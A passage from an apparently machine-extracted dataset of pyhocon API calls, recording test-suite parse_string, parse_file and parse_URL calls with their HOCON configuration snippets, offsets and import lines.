'ConfigFactory.parse_string', (['"""\n application.foo = 128mm\n application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]\n """'], {}), '(\n """\n application.foo = 128mm\n application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]\n """\n )\n', (20404, 20654), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21025, 21387), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n application.foo = 128mm\n application.default-jvm-opts = ["-XX:+UseParNewGC"]\n application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}\n """'], {}), '(\n """\n application.foo = 128mm\n application.default-jvm-opts = ["-XX:+UseParNewGC"]\n application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}\n """\n )\n', (21051, 21387), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24172, 24344), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x = ${x} [3,4]\n x = [-1, 0] ${x} [5, 6]\n x = [-3, -2] ${x}\n """'], {}), '(\n """\n x = [1,2]\n x = ${x} [3,4]\n x = [-1, 0] ${x} [5, 6]\n x = [-3, -2] ${x}\n """\n )\n', (24198, 24344), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24481, 24578), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x += [3,4]\n """'], {}), '(\n """\n x = [1,2]\n x += [3,4]\n """)\n', (24507, 24578), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24794, 24887), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = abc\n x += def\n """'], {}), '(\n """\n x = abc\n x += def\n """)\n', (24820, 24887), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25089, 25157), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += def\n """'], {}), '("""\n x += def\n """)\n', (25115, 25157), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25289, 25359), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += [1,2]\n """'], {}), '("""\n x += [1,2]\n """)\n', (25315, 25359), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25480, 25579), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {a: 1}\n x += {b: 2}\n """'], {}), '(\n """\n x = {a: 1}\n x += {b: 2}\n """)\n', (25506, 25579), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25717, 25788), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += {a: 1}\n """'], {}), '("""\n x += {a: 1}\n """)\n', (25743, 25788), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25928, 26087), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x = {x: [3,4]}\n x = {y: [5,6]}\n x = {z: ${x}}\n """'], {}), '(\n """\n x = [1,2]\n x = {x: [3,4]}\n x = {y: [5,6]}\n x = {z: ${x}}\n """\n )\n', (25954, 26087), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26324, 26437), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {x: [3,4]}\n x = [${x}, 2, 3]\n """'], {}), '(\n """\n x = {x: [3,4]}\n x = [${x}, 2, 3]\n """\n )\n', (26350, 26437), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26650, 26753), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {y: {z: 1}}\n x = ${x.y}\n """'], {}), '(\n """\n x = {y: {z: 1}}\n x = ${x.y}\n """)\n', (26676, 26753), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26991, 27094), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {y: {y: 1}}\n x = ${x.y}\n """'], {}), '(\n """\n x = {y: {y: 1}}\n x = ${x.y}\n """)\n', (27017, 27094), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27824, 27972), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo : { a : { c : 1 } }\n foo : ${foo.a}\n foo : { a : 2 }\n """'], {}), '(\n """\n foo : { a : { c : 1 } }\n foo : ${foo.a}\n foo : { a : 2 }\n """\n )\n', (27850, 27972), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((28220, 28366), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n """'], {}), '(\n """\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n """\n )\n', (28246, 28366), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((28630, 28811), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n bar : { foo : 43 }\n """'], {}), '(\n """\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n bar : { foo : 43 }\n """\n )\n', (28656, 28811), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29082, 29347), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n // bar.a should end up as 4\n bar : { a : ${foo.d}, b : 1 }\n bar.b = 3\n // foo.c should end up as 3\n foo : { c : ${bar.b}, d : 2 }\n foo.d = 4\n """'], {}), '(\n """\n // bar.a should end up as 4\n bar : { a : ${foo.d}, b : 1 }\n bar.b = 3\n // foo.c should end up as 3\n foo : { c : ${bar.b}, d : 2 }\n foo.d = 4\n """\n )\n', (29108, 29347), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29657, 29729), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = ${?a}foo\n """'], {}), '("""\n a = ${?a}foo\n """)\n', (29683, 29729), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30178, 30356), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {a: 1, b: 2}\n x = ${x} {c: 3}\n x = {z: 0} ${x}\n x = {y: -1} ${x} {d: 4}\n """'], {}), '(\n """\n x = {a: 1, b: 2}\n x = ${x} {c: 3}\n x = {z: 0} ${x}\n x = {y: -1} ${x} {d: 4}\n """\n )\n', (30204, 30356), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30506, 30765), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a.b = 3\n a.b = ${a.b}\n a.b = ${a.b}\n a.c = [1,2]\n a.c = ${a.c}\n a.d = {foo: bar}\n a.d = ${a.d}\n\n """'], {}), '(\n """\n a.b = 3\n a.b = ${a.b}\n a.b = ${a.b}\n a.c = [1,2]\n a.c = ${a.c}\n a.d = {foo: bar}\n a.d = ${a.d}\n\n """\n )\n', (30532, 30765), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30918, 31057), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = perl java python\n """'], {}), '(\n """\n common_modules = perl java python\n """\n )\n', (30944, 31057), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31257, 31402), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl] [java] [python]\n """'], {}), '(\n """\n common_modules = [perl] [java] [python]\n """\n )\n', (31283, 31402), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31551, 31702), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = {a:perl} {b:java} {c:python}\n """'], {}), '(\n """\n common_modules = {a:perl} {b:java} {c:python}\n """\n )\n', (31577, 31702), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31866, 31914), 'pyhocon.ConfigFactory.parse_URL', 'ConfigFactory.parse_URL', (['"""file:samples/aws.conf"""'], {}), "('file:samples/aws.conf')\n", (31889, 31914), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32121, 32165), 'pyhocon.ConfigFactory.parse_URL', 'ConfigFactory.parse_URL', (['"""https://nosuchurl"""'], {}), "('https://nosuchurl')\n", (32144, 32165), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32258, 32306), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/animals.conf"""'], {}), "('samples/animals.conf')\n", (32282, 32306), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32499, 32551), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/all_animals.conf"""'], {}), "('samples/all_animals.conf')\n", (32523, 32551), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32752, 32801), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/all_bars.conf"""'], {}), "('samples/all_bars.conf')\n", (32776, 32801), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33179, 33327), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n {a: 1, b: 2},\n {a: 3, c: 4},\n ]\n """'], {}), '(\n """\n a: [\n {a: 1, b: 2},\n {a: 3, c: 4},\n ]\n """\n )\n', (33205, 33327), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33493, 33627), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n [1, 2]\n [3, 4]\n ]\n """'], {}), '(\n """\n a: [\n [1, 2]\n [3, 4]\n ]\n """\n )\n', (33519, 33627), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33784, 34001), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b = {f: 4}\n a: [\n ${b} {a: 1, b: 2},\n {a: 3, c: 4} ${b},\n {a: 3} ${b} {c: 6},\n ]\n """'], {}), '(\n """\n b = {f: 4}\n a: [\n ${b} {a: 1, b: 2},\n {a: 3, c: 4} ${b},\n {a: 3} ${b} {c: 6},\n ]\n """\n )\n', (33810, 34001), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34232, 34434), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b = [5, 6]\n a: [\n ${b} [1, 2]\n [3, 4] ${b}\n [1, 2] ${b} [7, 8]\n ]\n """'], {}), '(\n """\n b = [5, 6]\n a: [\n ${b} [1, 2]\n [3, 4] ${b}\n [1, 2] ${b} [7, 8]\n ]\n """\n )\n', (34258, 34434), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((36386, 36546), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n include "dummy.txt"\n 3\n 4\n ]\n """'], {}), '(\n """\n a: [\n include "dummy.txt"\n 3\n 4\n ]\n """\n )\n', (36412, 36546), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((36657, 36829), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n include required("samples/animals.d/cat.conf")\n t = 2\n }\n """'], {}), '(\n """\n a {\n include required("samples/animals.d/cat.conf")\n t = 2\n }\n """\n )\n', (36683, 36829), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37065, 37243), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n include required(file("samples/animals.d/cat.conf"))\n t = 2\n }\n """'], {}), '(\n """\n a {\n include required(file("samples/animals.d/cat.conf"))\n t = 2\n }\n """\n )\n', (37091, 37243), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37663, 37724), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""pyhocon:config_parser.py"""'], {}), "('pyhocon:config_parser.py')\n", (37696, 37724), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37740, 37760), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (37754, 37760), False, 'import os\n'), ((38165, 38183), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (38181, 38183), False, 'import tempfile\n'), ((41436, 41522), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n include-database=true\n """'], {}), '(\n """\n include-database=true\n """)\n', (41462, 41522), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((41666, 42074), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n host = localhost\n port = 5432\n user = people\n name = peopledb\n pass = <PASSWORD>\n }\n\n user=test_user\n pass=<PASSWORD>\n\n database {\n user = ${user}\n pass = ${pass}\n }\n\n """'], {}), '(\n """\n database {\n host = localhost\n port = 5432\n user = people\n name = peopledb\n pass = <PASSWORD>\n }\n\n user=test_user\n pass=<PASSWORD>\n\n database {\n user = ${user}\n pass = ${pass}\n }\n\n """\n )\n', (41692, 42074), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((42253, 42489), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n name = peopledb\n pass = <PASSWORD>\n name = ${?NOT_EXISTS}\n pass = ${?NOT_EXISTS}\n }\n """'], {}), '(\n """\n database {\n name = peopledb\n pass = <PASSWORD>\n name = ${?NOT_EXISTS}\n pass = ${?NOT_EXISTS}\n }\n """\n )\n', (42279, 42489), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((42671, 42863), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: foo\n c: ${a} ${b}\n c: ${b} ${a}\n d: ${a} ${b}\n d: ${a} bar\n """'], {}), '(\n """\n a: 1\n b: foo\n c: ${a} ${b}\n c: ${b} ${a}\n d: ${a} ${b}\n d: ${a} bar\n """\n )\n', (42697, 42863), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43011, 43274), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n name = peopledb\n pass = <PASSWORD>\n }\n\n database {\n name = ${?user}\n pass = ${?pass}\n }\n\n """'], {}), '(\n """\n database {\n name = peopledb\n pass = <PASSWORD>\n }\n\n database {\n name = ${?user}\n pass = ${?pass}\n }\n\n """\n )\n', (43037, 43274), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43449, 43564), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: 42\n foo: ${?a}\n """'], {'resolve': '(False)'}), '(\n """\n foo: 42\n foo: ${?a}\n """, resolve\n =False)\n', (43475, 43564), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43585, 43650), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b: 14\n """'], {}), '("""\n b: 14\n """)\n', (43611, 43650), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43895, 43928), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""c=5"""'], {}), "('c=5')\n", (43921, 43928), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43947, 43998), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""b=${c}"""'], {'resolve': '(False)'}), "('b=${c}', resolve=False)\n", (43973, 43998), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((44271, 44477), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 45\n b = ${?c}\n d = ${?c} 4\n e = ${?a}\n g = ${?c1} ${?c2}\n h = ${?c1} ${?c2} 1\n """'], {}), '(\n """\n a = 45\n b = ${?c}\n d = ${?c} 4\n e = ${?a}\n g = ${?c1} ${?c2}\n h = ${?c1} ${?c2} 1\n """\n )\n', (44297, 44477), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((44713, 44887), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n num = 3\n retries_msg = You have ${num} retries\n retries_msg = ${?CUSTOM_MSG}\n """'], {}), '(\n """\n num = 3\n retries_msg = You have ${num} retries\n retries_msg = ${?CUSTOM_MSG}\n """\n )\n', (44739, 44887), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45312, 45489), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n 4\n\n b = # test\n # test2\n 5\n\n c =\n\n 6\n """'], {}), '(\n """\n a =\n 4\n\n b = # test\n # test2\n 5\n\n c =\n\n 6\n """\n )\n', (45338, 45489), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45647, 45803), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n short = 12\n long = 12321321837612378126213217321\n negative = -15\n """'], {}), '(\n """\n short = 12\n long = 12321321837612378126213217321\n negative = -15\n """\n )\n', (45673, 45803), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((46186, 46331), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 121.22\n b = -121.22\n c = .54\n d = -.54\n """'], {}), '(\n """\n a = 121.22\n b = -121.22\n c = .54\n d = -.54\n """\n )\n', (46212, 46331), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((46684, 46908), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n short = 12.12321\n long1 = 121.22E3423432\n neg_long1 = 121.22E-1\n long2 = 121.22e3423432\n neg_long2 = 121.22e-3\n """'], {}), '(\n """\n short = 12.12321\n long1 = 121.22E3423432\n neg_long1 = 121.22E-1\n long2 = 121.22e3423432\n neg_long2 = 121.22e-3\n """\n )\n', (46710, 46908), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((47301, 47484), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n "a"\n\n b = # test\n # test2\n "b"\n\n c =\n\n "c"\n """'], {}), '(\n """\n a =\n "a"\n\n b = # test\n # test2\n "b"\n\n c =\n\n "c"\n """\n )\n', (47327, 47484), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((47666, 47961), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n [\n 1,\n 2,\n ]\n\n b = # test\n # test2\n [\n 3,\n 4,]\n\n c =\n\n [\n 5,\n 6\n ]\n """'], {}), '(\n """\n a =\n [\n 1,\n 2,\n ]\n\n b = # test\n # test2\n [\n 3,\n 4,]\n\n c =\n\n [\n 5,\n 6\n ]\n """\n )\n', (47692, 47961), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((48152, 48459), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n [\n "a",\n "b",\n ]\n\n b = # test\n # test2\n [\n "c",\n "d",]\n\n c =\n\n [\n "e",\n "f"\n ]\n """'], {}), '(\n """\n a =\n [\n "a",\n "b",\n ]\n\n b = # test\n # test2\n [\n "c",\n "d",]\n\n c =\n\n [\n "e",\n "f"\n ]\n """\n )\n', (48178, 48459), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((48678, 48991), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n {\n a: 1,\n b: 2,\n }\n\n b = # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c =\n\n {\n e: 5,\n f: 6\n }\n """'], {}), '(\n """\n a =\n {\n a: 1,\n b: 2,\n }\n\n b = # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c =\n\n {\n e: 5,\n f: 6\n }\n """\n )\n', (48704, 48991), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49226, 49533), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a\n {\n a: 1,\n b: 2,\n }\n\n b # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c\n\n {\n e: 5,\n f: 6\n }\n """'], {}), '(\n """\n a\n {\n a: 1,\n b: 2,\n }\n\n b # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c\n\n {\n e: 5,\n f: 6\n }\n """\n )\n', (49252, 49533), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49750, 49870), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 123\n a = ${?test}\n a = 5\n """'], {}), '(\n """\n a = 123\n a = ${?test}\n a = 5\n """\n )\n', (49776, 49870), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49936, 50369), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n database {\n host = "localhost"\n port = 8000\n url = ${database.host}":"${database.port}\n }\n\n database {\n host = ${?DB_HOST}\n }\n\n database {\n host = "other.host.net"\n port = 433\n }\n }\n """'], {}), '(\n """\n {\n database {\n host = "localhost"\n port = 8000\n url = ${database.host}":"${database.port}\n }\n\n database {\n host = ${?DB_HOST}\n }\n\n database {\n host = "other.host.net"\n port = 433\n }\n }\n """\n )\n', (49962, 50369), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((50634, 50765), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {\n b: 1\n c: 2\n }\n """'], {}), '(\n """\n a = {\n b: 1\n c: 2\n }\n """\n )\n', (50660, 50765), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((50797, 50889), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a.b = 4\n a.d = 3\n """'], {}), '(\n """\n a.b = 4\n a.d = 3\n """)\n', (50823, 50889), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51079, 51148), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n name: foo\n """'], {}), '("""\n name: foo\n """)\n', (51105, 51148), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51190, 51296), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['u"""\n longName: "long "${?name}\n """'], {'resolve': '(False)'}), '(\n u"""\n longName: "long "${?name}\n """, resolve=False)\n', (51216, 51296), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51553, 51726), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n data-center-generic = { cluster-size: 8 }\n misc = "mist"\n }\n """'], {}), '(\n """\n {\n data-center-generic = { cluster-size: 8 }\n misc = "mist"\n }\n """\n )\n', (51579, 51726), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52286, 52364), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = [ 1, 2, 3 ]\n """'], {}), '("""\n list = [ 1, 2, 3 ]\n """)\n', (52312, 52364), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52405, 52511), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = ${list} [ 4, 5, 6 ]\n """'], {'resolve': '(False)'}), '(\n """\n list = ${list} [ 4, 5, 6 ]\n """, resolve=False)\n', (52431, 52511), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52737, 52815), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = [ 1, 2, 3 ]\n """'], {}), '("""\n list = [ 1, 2, 3 ]\n """)\n', (52763, 52815), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52856, 52954), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list += [ 4, 5, 6 ]\n """'], {'resolve': '(False)'}), '("""\n list += [ 4, 5, 6 ]\n """,\n resolve=False)\n', (52882, 52954), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53166, 53314), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a : { }\n b : 1\n c : ${a} { d : [ ${b} ] }\n """'], {'resolve': '(False)'}), '(\n """\n a : { }\n b : 1\n c : ${a} { d : [ ${b} ] }\n """\n , resolve=False)\n', (53192, 53314), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53357, 53461), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n e : ${a} {\n }\n """'], {'resolve': '(False)'}), '(\n """\n e : ${a} {\n }\n """, resolve=False)\n', (53383, 53461), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53508, 53550), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (53532, 53550), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53559, 53601), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (53593, 53601), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53718, 53866), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x : { v1: 1 }\n b1 : {v2: 2 }\n b = [${b1}]\n """'], {'resolve': '(False)'}), '(\n """\n x : { v1: 1 }\n b1 : {v2: 2 }\n b = [${b1}]\n """\n , resolve=False)\n', (53744, 53866), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53909, 54035), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b2 : ${x} {v2: 3}\n b += [${b2}]\n """'], {'resolve': '(False)'}), '(\n """\n b2 : ${x} {v2: 3}\n b += [${b2}]\n """,\n resolve=False)\n', (53935, 54035), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54078, 54120), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (54102, 54120), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54129, 54171), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (54163, 54171), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54378, 54500), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b1 : { v1: 1 }\n b = [${b1}]\n """'], {'resolve': '(False)'}), '(\n """\n b1 : { v1: 1 }\n b = [${b1}]\n """,\n resolve=False)\n', (54404, 54500), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54544, 54645), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', 